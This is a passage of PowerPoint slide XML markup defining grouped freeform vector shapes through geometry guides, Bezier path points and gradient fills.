                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 453 w 453"/>
                      <a:gd name="T1" fmla="*/ 156 h 156"/>
                      <a:gd name="T2" fmla="*/ 0 w 453"/>
                      <a:gd name="T3" fmla="*/ 36 h 156"/>
                      <a:gd name="T4" fmla="*/ 0 w 453"/>
                      <a:gd name="T5" fmla="*/ 0 h 156"/>
                      <a:gd name="T6" fmla="*/ 453 w 453"/>
                      <a:gd name="T7" fmla="*/ 123 h 156"/>
                      <a:gd name="T8" fmla="*/ 453 w 453"/>
                      <a:gd name="T9" fmla="*/ 156 h 1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3" h="156">
                        <a:moveTo>
                          <a:pt x="453" y="156"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="36"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="123"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="156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77" name="Freeform 1757">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9424A0BE-7D54-4A77-8AFC-9888D52BE0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64" y="1984"/>
                    <a:ext cx="306" cy="83"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 517"/>
                      <a:gd name="T1" fmla="*/ 37 h 139"/>
                      <a:gd name="T2" fmla="*/ 382 w 517"/>
                      <a:gd name="T3" fmla="*/ 139 h 139"/>
                      <a:gd name="T4" fmla="*/ 517 w 517"/>
                      <a:gd name="T5" fmla="*/ 101 h 139"/>
                      <a:gd name="T6" fmla="*/ 134 w 517"/>
                      <a:gd name="T7" fmla="*/ 0 h 139"/>
                      <a:gd name="T8" fmla="*/ 0 w 517"/>
                      <a:gd name="T9" fmla="*/ 37 h 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7" h="139">
                        <a:moveTo>
                          <a:pt x="0" y="37"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="382" y="139"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="517" y="101"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="134" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="37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061" name="Group 1758">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02343DDD-ABEB-4318-BBA1-AEF4BF0BAC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3356" y="1590"/>
                  <a:ext cx="215" cy="139"/>
                  <a:chOff x="126" y="1682"/>
                  <a:chExt cx="646" cy="417"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2062" name="Freeform 1759">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D11B5CE-5158-48EE-9079-D16BE3EE21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95" y="1682"/>
                    <a:ext cx="295" cy="368"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 14 w 211"/>
                      <a:gd name="T1" fmla="*/ 8 h 263"/>
                      <a:gd name="T2" fmla="*/ 14 w 211"/>
                      <a:gd name="T3" fmla="*/ 207 h 263"/>
                      <a:gd name="T4" fmla="*/ 192 w 211"/>
                      <a:gd name="T5" fmla="*/ 254 h 263"/>
                      <a:gd name="T6" fmla="*/ 192 w 211"/>
                      <a:gd name="T7" fmla="*/ 56 h 263"/>
                      <a:gd name="T8" fmla="*/ 14 w 211"/>
                      <a:gd name="T9" fmla="*/ 8 h 2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1" h="263">
                        <a:moveTo>
                          <a:pt x="14" y="8"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="16"/>
                          <a:pt x="1" y="187"/>
                          <a:pt x="14" y="207"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="27" y="226"/>
                          <a:pt x="179" y="263"/>
                          <a:pt x="192" y="254"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="204" y="246"/>
                          <a:pt x="211" y="94"/>
                          <a:pt x="192" y="56"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="185" y="42"/>
                          <a:pt x="28" y="0"/>
                          <a:pt x="14" y="8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63" name="Freeform 1760">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FA0B0C3-454E-4DCB-AC39-01EC1155B3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333" y="1719"/>
                    <a:ext cx="212" cy="291"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 359"/>
                      <a:gd name="T1" fmla="*/ 0 h 493"/>
                      <a:gd name="T2" fmla="*/ 0 w 359"/>
                      <a:gd name="T3" fmla="*/ 397 h 493"/>
                      <a:gd name="T4" fmla="*/ 359 w 359"/>
                      <a:gd name="T5" fmla="*/ 493 h 493"/>
                      <a:gd name="T6" fmla="*/ 359 w 359"/>
                      <a:gd name="T7" fmla="*/ 97 h 493"/>
                      <a:gd name="T8" fmla="*/ 0 w 359"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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59" h="493">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="397"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="359" y="493"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="359" y="9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69A2E1"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="69A2E1">
                          <a:gamma/>
                          <a:tint val="70588"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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64" name="Freeform 1761">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44EAC644-2950-4D3F-B7EC-DFBF3C6F39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315" y="1684"/>
                    <a:ext cx="284" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 99 w 203"/>
                      <a:gd name="T1" fmla="*/ 15 h 65"/>
                      <a:gd name="T2" fmla="*/ 27 w 203"/>
                      <a:gd name="T3" fmla="*/ 0 h 65"/>
                      <a:gd name="T4" fmla="*/ 0 w 203"/>
                      <a:gd name="T5" fmla="*/ 7 h 65"/>
                      <a:gd name="T6" fmla="*/ 0 w 203"/>
                      <a:gd name="T7" fmla="*/ 7 h 65"/>
                      <a:gd name="T8" fmla="*/ 0 w 203"/>
                      <a:gd name="T9" fmla="*/ 7 h 65"/>
                      <a:gd name="T10" fmla="*/ 178 w 203"/>
                      <a:gd name="T11" fmla="*/ 55 h 65"/>
                      <a:gd name="T12" fmla="*/ 203 w 203"/>
                      <a:gd name="T13" fmla="*/ 48 h 65"/>
                      <a:gd name="T14" fmla="*/ 99 w 203"/>
                      <a:gd name="T15" fmla="*/ 15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03" h="65">
                        <a:moveTo>
                          <a:pt x="99" y="15"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="2"/>
                          <a:pt x="27" y="0"/>
                          <a:pt x="27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12" y="0"/>
                          <a:pt x="168" y="44"/>
                          <a:pt x="178" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="188" y="65"/>
                          <a:pt x="203" y="48"/>
                          <a:pt x="203" y="48"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="203" y="48"/>
                          <a:pt x="163" y="29"/>
                          <a:pt x="99" y="15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65" name="Freeform 1762">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E884B1CA-99C5-4361-B628-CA36D93A47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564" y="1751"/>
                    <a:ext cx="208" cy="286"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 149"/>
                      <a:gd name="T1" fmla="*/ 205 h 205"/>
                      <a:gd name="T2" fmla="*/ 15 w 149"/>
                      <a:gd name="T3" fmla="*/ 201 h 205"/>
                      <a:gd name="T4" fmla="*/ 129 w 149"/>
                      <a:gd name="T5" fmla="*/ 150 h 205"/>
                      <a:gd name="T6" fmla="*/ 149 w 149"/>
                      <a:gd name="T7" fmla="*/ 112 h 205"/>
                      <a:gd name="T8" fmla="*/ 149 w 149"/>
                      <a:gd name="T9" fmla="*/ 60 h 205"/>
                      <a:gd name="T10" fmla="*/ 25 w 149"/>
                      <a:gd name="T11" fmla="*/ 0 h 205"/>
                      <a:gd name="T12" fmla="*/ 0 w 149"/>
                      <a:gd name="T13" fmla="*/ 7 h 205"/>
                      <a:gd name="T14" fmla="*/ 0 w 149"/>
                      <a:gd name="T15" fmla="*/ 205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49" h="205">
                        <a:moveTo>
                          <a:pt x="0" y="205"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="201"/>
                          <a:pt x="15" y="201"/>
                          <a:pt x="15" y="201"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="150"/>
                          <a:pt x="129" y="150"/>
                          <a:pt x="129" y="150"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="149" y="112"/>
                          <a:pt x="149" y="112"/>
                          <a:pt x="149" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="149" y="60"/>
                          <a:pt x="149" y="60"/>
                          <a:pt x="149" y="60"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="25" y="0"/>
                          <a:pt x="25" y="0"/>
                          <a:pt x="25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13" y="35"/>
                          <a:pt x="20" y="189"/>
                          <a:pt x="0" y="205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66" name="Freeform 1763">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F0FAB8-055B-4194-B512-F21C4B3ECE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26" y="1976"/>
                    <a:ext cx="391" cy="103"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 661"/>
                      <a:gd name="T1" fmla="*/ 52 h 175"/>
                      <a:gd name="T2" fmla="*/ 208 w 661"/>
                      <a:gd name="T3" fmla="*/ 0 h 175"/>
                      <a:gd name="T4" fmla="*/ 661 w 661"/>
                      <a:gd name="T5" fmla="*/ 121 h 175"/>
                      <a:gd name="T6" fmla="*/ 453 w 661"/>
                      <a:gd name="T7" fmla="*/ 175 h 175"/>
                      <a:gd name="T8" fmla="*/ 0 w 661"/>
                      <a:gd name="T9" fmla="*/ 52 h 1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61" h="175">
                        <a:moveTo>
                          <a:pt x="0" y="52"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="208" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="661" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="175"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="52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67" name="Freeform 1764">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F9DC11D-851A-4282-95EE-C0C0C2001AA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394" y="2047"/>
                    <a:ext cx="118" cy="52"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 199"/>
                      <a:gd name="T1" fmla="*/ 54 h 87"/>
                      <a:gd name="T2" fmla="*/ 0 w 199"/>
                      <a:gd name="T3" fmla="*/ 87 h 87"/>
                      <a:gd name="T4" fmla="*/ 199 w 199"/>
                      <a:gd name="T5" fmla="*/ 35 h 87"/>
                      <a:gd name="T6" fmla="*/ 199 w 199"/>
                      <a:gd name="T7" fmla="*/ 0 h 87"/>
                      <a:gd name="T8" fmla="*/ 0 w 199"/>
                      <a:gd name="T9" fmla="*/ 54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9" h="87">
                        <a:moveTo>
                          <a:pt x="0" y="54"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="199" y="35"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="199" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="54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68" name="Freeform 1765">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D77955ED-D175-4471-934E-0D2BAF79EB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26" y="2006"/>
                    <a:ext cx="268" cy="93"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 453 w 453"/>
                      <a:gd name="T1" fmla="*/ 156 h 156"/>
                      <a:gd name="T2" fmla="*/ 0 w 453"/>
                      <a:gd name="T3" fmla="*/ 36 h 156"/>
                      <a:gd name="T4" fmla="*/ 0 w 453"/>
                      <a:gd name="T5" fmla="*/ 0 h 156"/>
                      <a:gd name="T6" fmla="*/ 453 w 453"/>
                      <a:gd name="T7" fmla="*/ 123 h 156"/>
                      <a:gd name="T8" fmla="*/ 453 w 453"/>
                      <a:gd name="T9" fmla="*/ 156 h 1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3" h="156">
                        <a:moveTo>
                          <a:pt x="453" y="156"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="36"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="123"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="156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69" name="Freeform 1766">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A06B9A5-A1E1-40E4-A925-E20DA53F6A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64" y="1984"/>
                    <a:ext cx="306" cy="83"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 517"/>
                      <a:gd name="T1" fmla="*/ 37 h 139"/>
                      <a:gd name="T2" fmla="*/ 382 w 517"/>
                      <a:gd name="T3" fmla="*/ 139 h 139"/>
                      <a:gd name="T4" fmla="*/ 517 w 517"/>
                      <a:gd name="T5" fmla="*/ 101 h 139"/>
                      <a:gd name="T6" fmla="*/ 134 w 517"/>
                      <a:gd name="T7" fmla="*/ 0 h 139"/>
                      <a:gd name="T8" fmla="*/ 0 w 517"/>
                      <a:gd name="T9" fmla="*/ 37 h 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7" h="139">
                        <a:moveTo>
                          <a:pt x="0" y="37"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="382" y="139"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="517" y="101"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="134" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="37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EAEAEA"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="C0C0C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048" name="Group 1781">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70302359-1016-4E43-A74E-DBE04100B6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5867400" y="2433638"/>
                <a:ext cx="246063" cy="382588"/>
                <a:chOff x="2363" y="1132"/>
                <a:chExt cx="343" cy="529"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2055" name="Freeform 1782">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FEC3524-350D-4C61-81B2-3CFAC5A5BE4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74" y="1449"/>
                  <a:ext cx="145" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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56" name="Freeform 1783">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7AB6310-788E-41BA-8221-A157FF54649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18" y="1435"/>
                  <a:ext cx="267" cy="226"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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57" name="Freeform 1784">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2284E507-6499-430D-8DBE-3DE28EFC243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363" y="1229"/>
                  <a:ext cx="343" cy="269"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
